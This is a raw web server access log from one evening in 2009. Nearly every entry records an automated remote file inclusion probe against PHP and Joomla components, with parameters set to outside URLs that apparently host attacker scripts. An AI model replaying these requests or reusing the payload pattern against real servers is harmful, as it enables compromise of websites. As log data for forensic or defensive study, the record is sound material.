66.135.59.136 - - [27/Sep/2009:20:08:26 -0700] "GET /logs/access_090518.log/?sourcedir=http://nashi-deti.org.ua/plugins/editors/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.135.59.136 - - [27/Sep/2009:20:08:27 -0700] "GET /?sourcedir=http://nashi-deti.org.ua/plugins/editors/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.135.59.136 - - [27/Sep/2009:20:08:35 -0700] "GET /logs/access_090518.log/?sourcedir=http://nashi-deti.org.ua/plugins/editors/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:20:09:17 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:20:09:17 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:20:09:18 -0700] "GET /logs/access.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.135.59.136 - - [27/Sep/2009:20:09:19 -0700] "GET /logs/access_090518.log%20%20/?sourcedir=http://nashi-deti.org.ua/plugins/editors/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [27/Sep/2009:20:09:21 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [27/Sep/2009:20:10:09 -0700] "GET /logs/access_090817.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.135.59.136 - - [27/Sep/2009:20:10:32 -0700] "GET /logs/access_090518.log%20%20/?sourcedir=http://nashi-deti.org.ua/plugins/editors/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.135.59.136 - - [27/Sep/2009:20:11:32 -0700] "GET /logs/access_090406.log%20%20/?sourcedir=http://nashi-deti.org.ua/plugins/editors/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.135.59.136 - - [27/Sep/2009:20:12:30 -0700] "GET /logs/access_090406.log%20%20/?sourcedir=http://nashi-deti.org.ua/plugins/editors/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:20:12:47 -0700] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [27/Sep/2009:20:15:26 -0700] "GET /logs/access_090316.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:20:15:39 -0700] "GET /logs/access.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:20:15:44 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:20:15:44 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:20:15:44 -0700] "GET /logs/access_090316.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:20:15:45 -0700] "GET /logs/access_090316.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:20:15:45 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:20:15:45 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:20:16:17 -0700] "GET /logs/access_090316.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:20:16:20 -0700] "GET /logs/access_090316.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:20:17:37 -0700] "GET /?sourcedir=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:20:17:45 -0700] "GET /logs/access_090518.log%20%20/?sourcedir=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.209.190 - - [27/Sep/2009:20:17:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.190 - - [27/Sep/2009:20:17:50 -0700] "GET /?N=D HTTP/1.1" 200 1048 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.43.202.66 - - [27/Sep/2009:20:18:13 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
211.43.202.66 - - [27/Sep/2009:20:18:13 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
174.37.51.234 - - [27/Sep/2009:20:19:15 -0700] "GET /logs/access_090420.log///vwar/backup/errors.php?error=http://163.19.225.120/rfi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
174.37.51.234 - - [27/Sep/2009:20:19:15 -0700] "GET //vwar/backup/errors.php?error=http://163.19.225.120/rfi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
174.37.51.234 - - [27/Sep/2009:20:19:15 -0700] "GET /logs///vwar/backup/errors.php?error=http://163.19.225.120/rfi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:20:19:17 -0700] "GET /logs/access.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:20:19:17 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:20:19:17 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:20:19:34 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:20:19:34 -0700] "GET /logs/access_090629.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:20:19:34 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:20:19:39 -0700] "GET /logs/access_090720.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.200.80.9 - - [27/Sep/2009:20:21:37 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://btsecurity.duotone.ch/images/com_projectfork/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
81.200.80.9 - - [27/Sep/2009:20:21:38 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://btsecurity.duotone.ch/images/com_projectfork/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
201.38.0.130 - - [27/Sep/2009:20:22:50 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.38.0.130 - - [27/Sep/2009:20:22:50 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.38.0.130 - - [27/Sep/2009:20:22:50 -0700] "GET /logs/access_090420.log//components/com_flyspray/startdown.php?file=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:20:23:16 -0700] "GET /logs/access_090629.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:20:23:16 -0700] "GET /logs/access_090720.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.252.90.80 - - [27/Sep/2009:20:24:22 -0700] "GET /logs/access_090420.log//components/com_flyspray/startdown.php?file=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.252.90.80 - - [27/Sep/2009:20:24:22 -0700] "GET /components/com_flyspray/startdown.php?file=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.252.90.80 - - [27/Sep/2009:20:24:23 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.200.80.9 - - [27/Sep/2009:20:25:06 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://btsecurity.duotone.ch/images/com_projectfork/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "galf.org"
81.200.80.9 - - [27/Sep/2009:20:25:06 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://btsecurity.duotone.ch/images/com_projectfork/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "galf.org"
211.43.202.66 - - [27/Sep/2009:20:28:33 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
211.43.202.66 - - [27/Sep/2009:20:28:33 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
201.38.0.130 - - [27/Sep/2009:20:29:50 -0700] "GET /logs/access_090420.log%20%20//components/com_flyspray/startdown.php?file=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.225.253.135 - - [27/Sep/2009:20:31:32 -0700] "GET /logs/access.log//login.php?dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:20:32:33 -0700] "GET /skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:20:32:33 -0700] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:20:32:33 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:20:32:42 -0700] "GET /skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:20:32:42 -0700] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:20:32:42 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
8.12.161.82 - - [27/Sep/2009:20:33:09 -0700] "GET /skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
8.12.161.82 - - [27/Sep/2009:20:33:09 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [27/Sep/2009:20:33:10 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [27/Sep/2009:20:33:10 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [27/Sep/2009:20:33:11 -0700] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
8.12.161.82 - - [27/Sep/2009:20:33:13 -0700] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [27/Sep/2009:20:33:24 -0700] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.38.0.130 - - [27/Sep/2009:20:33:44 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
201.38.0.130 - - [27/Sep/2009:20:33:44 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
201.38.0.130 - - [27/Sep/2009:20:33:44 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.252.90.80 - - [27/Sep/2009:20:33:51 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.252.90.80 - - [27/Sep/2009:20:33:51 -0700] "GET /components/com_flyspray/startdown.php?file=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.252.90.80 - - [27/Sep/2009:20:33:51 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [27/Sep/2009:20:34:41 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [27/Sep/2009:20:34:41 -0700] "GET /logs/access_090706.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [27/Sep/2009:20:34:41 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:20:36:00 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:20:36:00 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:20:36:00 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [27/Sep/2009:20:36:00 -0700] "GET /logs/access_090330.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [27/Sep/2009:20:36:00 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [27/Sep/2009:20:36:00 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [27/Sep/2009:20:36:10 -0700] "GET /logs/access_090504.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [27/Sep/2009:20:36:13 -0700] "GET /logs/access_090629.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:20:36:27 -0700] "GET /logs/access_090330.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:20:36:35 -0700] "GET /logs/access_090504.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:20:39:05 -0700] "GET /logs/access_090608.log//common/db.php?commonpath=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:20:39:05 -0700] "GET /common/db.php?commonpath=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:20:39:05 -0700] "GET /logs//common/db.php?commonpath=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:20:39:16 -0700] "GET /logs/access_090615.log//common/db.php?commonpath=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [27/Sep/2009:20:39:36 -0700] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [27/Sep/2009:20:39:42 -0700] "GET /logs/access_090525.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
8.12.161.82 - - [27/Sep/2009:20:40:21 -0700] "GET /logs/access.log%20%20//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:20:40:22 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:20:40:22 -0700] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:20:40:22 -0700] "GET /skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.135.59.136 - - [27/Sep/2009:20:40:39 -0700] "GET /logs/access_090810.log/?sourcedir=http://nashi-deti.org.ua/plugins/editors/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [27/Sep/2009:20:40:54 -0700] "GET /logs/access_090706.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [27/Sep/2009:20:40:56 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [27/Sep/2009:20:41:27 -0700] "GET /logs/access_090629.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [27/Sep/2009:20:45:02 -0700] "GET /logs/access_090223.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:20:46:18 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
216.145.96.20 - - [27/Sep/2009:20:46:18 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
216.145.96.20 - - [27/Sep/2009:20:46:18 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.147.225.158 - - [27/Sep/2009:20:46:31 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.147.225.158 - - [27/Sep/2009:20:46:31 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.147.225.158 - - [27/Sep/2009:20:46:31 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:20:46:39 -0700] "GET /logs/access_090831.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:20:46:39 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:20:46:39 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:20:47:09 -0700] "GET /logs/access_090511.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
